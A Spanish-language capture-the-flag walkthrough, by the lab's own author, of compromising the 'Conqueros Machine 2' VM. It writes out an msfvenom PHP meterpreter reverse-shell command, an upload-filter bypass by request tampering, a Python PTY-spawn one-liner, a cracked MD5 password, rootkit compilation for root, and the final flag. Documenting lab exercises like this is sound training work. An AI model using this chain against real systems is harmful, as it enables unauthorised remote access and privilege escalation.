Welcome to everybody!! Hoy os voy a presentar la solución a la máquina Conqueros Machine 2 diseñada por este servidor, el aburrimiento es muy malo y en estos días de lluvia no hay nada mejor que diseñar cosas para romperle la cabeza al resto del mundo 😉 .

Bien! comencemos!. Esta máquina está alojada sobre un Ubuntu Server 14.04 y requiere de 1 gb de ram por default pero con 512 mb funcionará de perlas también, sientete libre de de bajar los recuros ram si tu host anfitrión está justito de recursos.

Descarga de la máquina

LOGO

Lo primero que voy a realizar es un escaneo de la red en la que estoy conectado para hacerme una idea de cuantas máquinas hay conectadas dentro de esta.

1.PNG

Con esto ya se que el scaneo de nmap no va a ser demasia extenso en tiempo de manera que lo voy a lanzar a toda la red y no voy a ir segmentando el scaneo de la red en esta ocasión.

2

El scaneo de nmap identifica la máquina y su dirección IP, así como que poseé el puerto 80 abierto (Puerto Web).

En este punto el paso a seguir ahora es acceder al puerto 80 y ver que hay dentro.

3

Estamos ante un sitio que nos indica que debemos insertar la url y una petición get según parece en un rango de hasta 100.

Para ello este código de python funciona correctamente y es una manera de simplificar el fuzzeo de los rangos y obtener un título con el fin de obtener il id adecuado.

https://pastebin.com/cndWunJX

 

4

Lo que corresponde en este momento es acceder a la url de la máquina con el id=63 y ver su respuesta.

5

El primer paso fué descargar todas las imágenes y hacer un estudio de metadatos que resultó estar sin nada interesante ni relevante para la resolución de la máquina.

Se aprecia que existe un upload de manera que vamos a ver de que forma se comporta.

6.PNG

El upload funciona correctamente de manera que el paso el generar una shell en php para intentar acceder al servidor, esta tarea la realizaremos con msfvenom -p php/meterpreter/reverse_tcp lhost=ip_maquina_que_recivirá_la_sesión lport=puerto_maquina_que_recivirá_la_sesión

7

Al intentar subir la shell el upload da el error de que ese tipo de archivo no está permitido, por ello, usaré tamper data en firefox y modificaré la petición del servidor a la hora de subir el archivo, el proceso es sencillo:

  • Renombraré la shell.php a shell.php.png .
  • Usaré tamper data para modificar el archivo ya en el momento de su transporte y renombraré de nuevo shell.php.png a shell.php .
  • Configuraré metasploit para recibir la escucha.
  • Abriré la shell desde el navegador.

8910

11.PNG

Este punto requiere saber en que carpeta se ha subido nuestra shell y para ello abiremos en una pestaña nueva la imagen del barco que subimos anteriormente y veremos el path de los archivos subidos al servidor.

12

Sacando conclusiones nuestra shell estará alojada en ip_sevidor/images/shell.php pero antes de lanzarla debemos configurar la escucha en el metasploit.

13

Ahora si voy a lanzar desde el explorador el archivo shell.php

14.PNG

En este punto toca buscar dentro de los directorios del servidor y en el path /home/conquer encontramos esto:

15

Vamos a proceder a decodificar este md5 para ver cual es la contraseña que guarda:

16

El md5 esconde la contraseña admiin

dentro de home existe una carpeta llamada conqueradmin a la que vamos a acceder.

17.PNG

Desde el meterpreter no podemos acceder a la carpeta de modo que abriré una shell para intentar logearme como conqueradmin con la password admiin.

18

Al parecer Ubuntu está protegido para elevaciones su desde una shell reversa, por ese motivo vamos a invocarla mediante esta sentencia de python:

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py
python /tmp/asdf.py

19

Ya puedo acceder a su conqueradmin

20

21

Se aprecia que este usuario se ha dejado un rootkit sin compilar, de manera que vamos a aprovechar esta oportunidad y ver si realmente este archivo nos otorga permisos de root.

Para compilarlo utilizaremos: gcc rootkit.c -o rootkit

22

Ya existe el rootkit compilado y solo falta darle permisos de ejecución y lanzarlo.

23

En este punto hay que buscar por los directorios hasta encontrar el siguiente paso a seguir o la flag final.

24

Al acceder al directorio /root y listar el contenido se puede leer el fichero finalflag.txt que contiene la flag final: conqueros{r00tk1t_g00d_1d34}

Con esto se termina la segunda Conqueros Machine, espero que esta guía sea de ayuda y de vuestro agrado, habiendo llegado al final me despido amigos.

Hasta otra!.

Anuncios